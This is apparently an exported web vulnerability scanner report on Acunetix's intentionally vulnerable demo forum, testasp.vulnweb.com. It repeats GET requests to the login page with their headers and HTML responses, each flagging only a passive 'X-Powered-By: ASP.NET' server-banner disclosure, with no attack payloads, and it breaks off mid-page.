<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td 